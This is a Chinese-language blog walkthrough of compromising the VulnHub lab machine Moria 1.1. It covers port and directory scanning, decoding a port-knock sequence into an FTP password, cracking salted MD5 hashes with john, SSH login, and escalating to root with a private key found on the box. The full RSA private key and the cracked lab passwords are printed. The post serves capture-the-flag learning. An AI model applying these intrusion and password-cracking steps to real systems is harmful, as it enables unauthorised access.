Moria 1.1 靶机

Moria 1.1 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.154
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 03:20 EDT
Nmap scan report for 192.1.1.154
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:09:B3:87 (VMware)

开放了21, 22, 80 端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 192.1.1.154
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 03:21 EDT
Nmap scan report for 192.1.1.154
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
|   256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_  256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Gates of Moria
MAC Address: 00:0C:29:09:B3:87 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

21 端口 vsftpd 2.0.8,Centos 系统,80 端口 Apache/2.4.6 (CentOS) PHP/5.4.16

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo nmap --script=vuln -p21,22,80 192.1.1.154           
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 03:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.1.1.154
Host is up (0.00028s latency).

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /w/: Potentially interesting folder w/ directory listing
|_  /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:09:B3:87 (VMware)

发现了 /w/ 文件夹

目录爆破

试一试目录爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo gobuster dir -u http://192.1.1.154/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,sql,tar,php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.154/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,html,sql,tar,php
[+] Timeout:                 10s
===============================================================
2023/09/18 03:25:39 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 85]
/.html                (Status: 403) [Size: 207]
/w                    (Status: 301) [Size: 229] [--> http://192.1.1.154/w/]
/.html                (Status: 403) [Size: 207]
Progress: 1321206 / 1323366 (99.84%)
===============================================================
2023/09/18 03:27:46 Finished
===============================================================

除了 /w 没发现更有价值的目录,先看看 Web 界面吧

Web 渗透

网站根目录是一张图片,网站标题是 Gates of Moria,图片名字是 moria

直接谷歌搜索 Gates of Moria

第一个链接中的故事背景简单梳理了一下,大意是这个门是有个密码的,甘道夫刚开始没想出密码是什么,对话时巧合之下,明白了密码是 Mellon,意为朋友。先记录下来 Mellon

是一个可以一直点击的目录,点到最后得到这样的内容

刷新了几次,发现每次都随机得到一段话,中间也会重复几次,收集了一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
"Is this the end?" 
Nain:"Will the human get the message?" 
Dain:"Is that human deaf? Why is it not listening?"
"Knock knock" 
Fundin:"That human will never save us!"
Ori:"Will anyone hear us?" 
"We will die here.." 
Telchar to Thrain:"That human is slow, don't give up yet" 
Maeglin:"The Balrog is not around, hurry!" 
Oin:"Stop knocking!" 
"Eru! Save us!" 
"Too loud!" 
Balin: "Be quiet, the Balrog will hear you!"

看了半天,也没想懂是什么意思,不过起码收集到了一个用户字典

1
2
3
4
5
6
7
8
9
10
11
12
Dain
Fundin
Ori
Telchar
Thrain
Maeglin
Oin
Balin
Balrog
gandalf
Gandalf
Moria

尝试使用 Mellon 作为密码ftp爆破失败,只好去看 WP,这里的思路赶紧有点 CTF 的感觉,竟然是要通过 wireshark 抓包。

抓包发现,网站会定期向攻击机的 77, 101, 108, 108, 111, 110, 54, 57 端口发送连接

这里要意识到上述端口号与 ascii 码是一一对应的(这也太绕了,确实想不到),得到 Mellon69 看起来和刚才拿到的密码类似,或许是 ftp 的密码,再次尝试爆破的时候发现,靶机似乎有放爆破机制,自己似乎被封禁了(

FTP 登录

逐个手动尝试发现,Balrog:Mellon69 是正确的 ftp 登录口令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ ftp 192.1.1.154                                   
Connected to 192.1.1.154.
220 Welcome Balrog!
Name (192.1.1.154:kali): Balrog
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -alih
229 Entering Extended Passive Mode (|||7459|).
150 Here comes the directory listing.
drwxr-x---    2 0        1001           27 Mar 14  2017 .
dr-xr-xr-x   18 0        0             258 Mar 14  2017 ..
-rw-r--r--    1 0        0               1 Apr 28  2017 .bash_history
226 Directory send OK.
ftp> get .bash_history
local: .bash_history remote: .bash_history
229 Entering Extended Passive Mode (|||26556|).
550 Permission denied.
ftp> pwd
Remote directory: /prison

似乎可以访问其他目录,尝试看看 web 目录和家目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ftp> cd /home
550 Failed to change directory.
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls -liah
229 Entering Extended Passive Mode (|||15279|).
150 Here comes the directory listing.
drwxr-xr-x    4 0        0              89 Mar 14  2017 .
drwxr-xr-x    4 0        0              33 Nov 14  2016 ..
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
ftp> cd QlVraKW4fbIkXau9zkAPNGzviT3UKntl
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||57806|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0            1672 Mar 12  2017 index.php
226 Directory send OK.
ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||30599|).
550 Permission denied.

发现了 QlVraKW4fbIkXau9zkAPNGzviT3UKntl 目录,但是无法将其中的文件下载到本地,那就网页访问看看

网页中应该是密码哈希,网页源码中的注释给出了盐值

接下来的任务是通过工具来爆破碰撞出哈希值所对应的密码

爆破加盐哈希

原本想使用 hashcat,但是似乎不支持这种 MD5(MD5(Password).Salt) 模式,看看 john。使用谷歌搜索 john salt md5,在第一个链接中找到了使用方法和哈希文件的格式

简单的数据处理

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ awk 'FNR==NR {arr[FNR]=$0; next} {print arr[FNR],$0}' salt sshloginpasswd  
6MAp84 c2d8960157fc8540f6d5d66594e165e0
bQkChe 727a279d913fba677c490102b135e51e
HnqeN4 8c3c3152a5c64ffb683d78efc3520114
e5ad5s 6ba94d6322f53f30aca4f34960203703
g9Wxv7 c789ec9fae1cd07adfc02930a39486a1
HCCsxP fec21f5c7dcf8e5e54537cfda92df5fe
cC5nTr 6a113db1fd25c5501ec3a5936d817c29
h8spZR 7db5040c351237e8332bfbba757a1019
tb9AWe dd272382909a4f51163c77da6356cc6f

写入到文件后,再使用 awk 简单调整下,print 的时候添加个$

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ sudo john --format=dynamic='md5(md5($p).$s)' --wordlist=/usr/share/wordlists/rockyou.txt hashuserpass 
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic=md5(md5($p).$s) [256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
flower           (?)     
warrior          (?)     
spanky           (?)     
rainbow          (?)     
abcdef           (?)     
fuckoff          (?)     
darkness         (?)     
magic            (?)     
hunter2          (?)     
9g 0:00:00:00 DONE (2023-09-18 08:26) 450.0g/s 672000p/s 2016Kc/s 2016KC/s chulita..waiting
Use the "--show --format=dynamic=md5(md5($p).$s)" options to display all of the cracked passwords reliably
Session completed.

使用 hydra 爆破的时候又遇到了可能是被封 IP 的问题,最后一点点手动尝试,发现 ori:spanky 是 ssh 登录的口令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ ssh Ori@192.1.1.154
Ori@192.1.1.154\'s password: 
Last login: Sun Mar 12 22:57:09 2017
-bash-4.2$ whoami
Ori
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
-bash-4.2$ uname -a
Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-bash-4.2$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:09:b3:87 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.154/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1400sec preferred_lft 1400sec
    inet6 fe80::deef:db78:6f77:ebdf/64 scope link 
       valid_lft forever preferred_lft forever
-bash-4.2$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for Ori: 
Sorry, user Ori may not run sudo on Moria.
-bash-4.2$ echo $SHELL
/bin/bash
-bash-4.2$ pwd
/home/Ori
-bash-4.2$ ls -alih
total 8.0K
  161138 drwx------  3 Ori  notBalrog  55 Mar 12  2017 .
50331740 drwxr-x---. 4 root notBalrog  32 Mar 14  2017 ..
  275393 -rw-------  1 Ori  notBalrog   1 Mar 14  2017 .bash_history
   31082 -rw-r--r--  1 root root      225 Mar 13  2017 poem.txt
50614599 drwx------  2 Ori  notBalrog  57 Mar 12  2017 .ssh
-bash-4.2$ cat poem.txt 
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by. 

PS: Moria will not fall!
-bash-4.2$ cat .bash_history

登录成功,家目录中有个 poem.txt ,没太看懂。

1
2
3
4
5
6
7
8
9
-bash-4.2$ ls -liah /etc/passwd /etc/shadow /etc/crontab
16865300 -rw-r--r-- 1 root root  450 Mar 11  2017 /etc/crontab
16784990 -rw-r--r-- 1 root root 1.5K Mar 14  2017 /etc/passwd
17556984 ---------- 1 root root 1.2K Apr 28  2017 /etc/shadow
-bash-4.2$ ls /home
abatchy  Ori
-bash-4.2$ cd /home/abatchy/
-bash: cd: /home/abatchy/: Permission denied

另一个用户的家目录进不去,我还尝试了使用之前收集到的密码手动切换登录,也失败了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
-bash-4.2$ find / -type f -perm -04000 -ls 2>/dev/null
50468854   24 -rws--x--x   1 root     root        23960 Nov  5  2016 /usr/bin/chfn
50458347   64 -rwsr-xr-x   1 root     root        64240 Nov  5  2016 /usr/bin/chage
50468776   80 -rwsr-xr-x   1 root     root        78216 Nov  5  2016 /usr/bin/gpasswd
50468778   44 -rwsr-xr-x   1 root     root        41776 Nov  5  2016 /usr/bin/newgrp
50468856   24 -rws--x--x   1 root     root        23872 Nov  5  2016 /usr/bin/chsh
50591427  128 ---s--x--x   1 root     root       130768 Dec  6  2016 /usr/bin/sudo
50468888   44 -rwsr-xr-x   1 root     root        44232 Nov  5  2016 /usr/bin/mount
50468935   32 -rwsr-xr-x   1 root     root        32088 Nov  5  2016 /usr/bin/su
50468939   32 -rwsr-xr-x   1 root     root        31968 Nov  5  2016 /usr/bin/umount
50654074 2356 -rwsr-xr-x   1 root     root      2409560 Nov  5  2016 /usr/bin/Xorg
50495460   60 -rwsr-xr-x   1 root     root        57552 Mar 31  2016 /usr/bin/crontab
50339027   28 -rwsr-xr-x   1 root     root        27680 Mar  2  2017 /usr/bin/pkexec
50591210   28 -rwsr-xr-x   1 root     root        27832 Jun 10  2014 /usr/bin/passwd
50341723   32 -rwsr-xr-x   1 root     root        32008 Nov  5  2016 /usr/bin/fusermount
161386   12 -rwsr-xr-x   1 root     root        11224 Nov  5  2016 /usr/sbin/pam_timestamp_check
161390   36 -rwsr-xr-x   1 root     root        36280 Nov  5  2016 /usr/sbin/unix_chkpwd
288837   12 -rwsr-xr-x   1 root     root        11296 Nov  5  2016 /usr/sbin/usernetctl
33705013   16 -rwsr-xr-x   1 root     root        15432 Mar  2  2017 /usr/lib/polkit-1/polkit-agent-helper-1
267781  312 -rwsr-x---   1 root     dbus       318424 Nov  6  2016 /usr/lib64/dbus-1/dbus-daemon-launch-helper

SUID 文件也没收获。

私钥登录提权

使用 linpeas 来收集信息。发现自己忘了 .ssh 文件夹

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
-bash-4.2$ cd .ssh
-bash-4.2$ ls
id_rsa  id_rsa.pub  known_hosts
-bash-4.2$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAu+OTcbouwWKZ6JRYBJXSIp9c8N/+w/0R7A0s5K1Kj45FBhpA
k0U/eZJIcpZZYUu9a5yfEZFnlUHshVjD12KTvvANIfvTalP0+uGrOSlF/b1tt8Ol
VQW8bgvAJXGom881bsUnu5r4BXp0S5HIoRES2k9BHkP7ZmkhknC83D+zTln/2uHv
H/piA5x3aFKDz3NzvJQNEjn/U9pivljAVVruXa0TDYDnjexsZtG3Ctse9fQlj7sq
sosqmU2aXEu03R/oHN+jlMn2woKiRnUdoCNaNe5/lYS7leMcMl8AI7hEMgJXSudB
GCyLuzDvbQgRi3dOFAs72YSuG/dtMNooEHLr4QIDAQABAoIBAQCGpQbDqE3bTgLH
lo8g8hC9uQCMqajT4KaYR7TVR444JBc40VVXdHeRcpAydaYlwHZFCN9BYrcdUjni
MYNe9Yi1eyeeI+4Us4fKxi/C7d33gWmAGFeB/3NSVV9kNfhDeBFtiSH5Iov8uQ1g
Hl/tdOPSyJr8ynD9qfdiDyJ4n7mqOj/zxT9FxHU2MXQIgQlaGrdeJNS28SAi+Qmp
W5qqN2cVxL9rhsD29XQu7X7p/rHKpaVOmeCnr8r7mykhW7XZ1oDHypWUyVJQTcag
7LR5iHr4PBT0esCKeGp8HPClGoD7txsH6JHKLqgoOuhzN9yz8LaBpjUtxPx6sIGr
nvChTYLVAoGBAOgz2cvnIDImduC8K3BKDfnvT7p9S6qKG/zANCmSIpFvODOWJKMh
/cvrpAdhqYibp8irtcFu2MMGbaZiDY6pjXq1FaTsWXaAU1+4ScPG7lARL3zhti7q
iUq3KIwk0gJP2Tuta9TOnBk7bIF+q1WCmi0jYIqhPfZPILykhYN/Kt3XAoGBAM8l
GS6lowCjsk6S9ru5Iroy+p9G1lds/ab7NXsk3dxRO4zxrrFPSRl/ztjupTTzBhXG
/+0cxncwM9JPZEKzeB48RG+BWKtVVUC96WNJvvzI9tIqL1cmyTZj7J3yAeBdwMj8
Qi9hdsABbqPUHrydDePDVsK//E/w6wIt/p2qVp0HAoGBAMOjVCCA9lZqpARLZknw
iwAGymT0xjjErjnw8sIHtwpT68VC/lFYBU63lfcGKOHJS78+NR/ptcXzd5UUzhlh
76rwQXE4FVRLYHOogLXruMRLBniwb1/uCYii8w3IxAxgnEW0osKk5U45C/267L5a
EG5xfRiwK9WH66wk7bzR+xr3AoGAMbFqqyAdTIf4vJTREBPH2vdj3FX4EZ0Z9LcL
C3G6r6HlMVjBWdP1a2KX0r7dbyhl60+EEfP3QJyVsfxNxxqa1FYM7NsQ1HlyLEfi
92i3opjrbVulY7jwSFYMa4+lF5gmKZEqp4cwH7u4OSEoBoN+04cHB01bUCoxlqJG
FLjKcn0CgYEAsKVwN6ED885zyrLQcYDkX4/w2gGW6Mrr0pIFnmQlkfGTqT3wZT09
ZMk2LuYPnowQDczFLmMnCw8HskSTIjUCri7vt/E3haMH7JC6YO7WAaRaJ81k9z10
eIJLNgKU5DxCtdKgGeIwlReZSPBBjU5FGtEhfJsL3n3bNYpfGk7ckug=
-----END RSA PRIVATE KEY-----
-bash-4.2$ ls
id_rsa  id_rsa.pub  known_hosts
-bash-4.2$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison
-bash-4.2$ cat known_hosts 
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=

known_hosts 中有 127.0.0.1 感觉比较奇怪

先把私钥下载到本地登录试试

1
2
3
┌──(kali㉿kali)-[~/Downloads/Moria 1.1]
└─$ ssh -i id_rsa ori@192.1.1.154 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa 
ori@192.1.1.154's password:

还是要我密码,不是很理解,既然 know_hosts 中有本机地址,尝试在靶机上登录试试

1
2
3
4
5
6
7
8
9
10
-bash-4.2$ ssh -i id_rsa ori@127.0.0.1
ori@127.0.0.1\'s password: 

-bash-4.2$ ls /home
abatchy  Ori
-bash-4.2$ ssh -i id_rsa abatchy@127.0.0.1
abatchy@127.0.0.1\'s password: 

-bash-4.2$ ssh -i id_rsa root@127.0.0.1
Last login: Wed Sep 20 01:58:48 2023 from 127.0.0.1

没想到竟然是 root 的私钥文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
[root@Moria ~]# whoami
root
[root@Moria ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:09:b3:87 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.154/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1745sec preferred_lft 1745sec
    inet6 fe80::deef:db78:6f77:ebdf/64 scope link 
       valid_lft forever preferred_lft forever
[root@Moria ~]# uname -a
Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[root@Moria ~]# cd /rot
-bash: cd: /rot: No such file or directory
[root@Moria ~]# cd /root
[root@Moria ~]# ls
0  anaconda-ks.cfg  Desktop  flag.txt  hosts
[root@Moria ~]# cat flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy
knowledge_database > vulnhub
Moria 1.1 靶机
https://i3eg1nner.github.io/2023/09/ef22d903c06e.html
作者
I3eg1nner
发布于
2023年9月18日
许可协议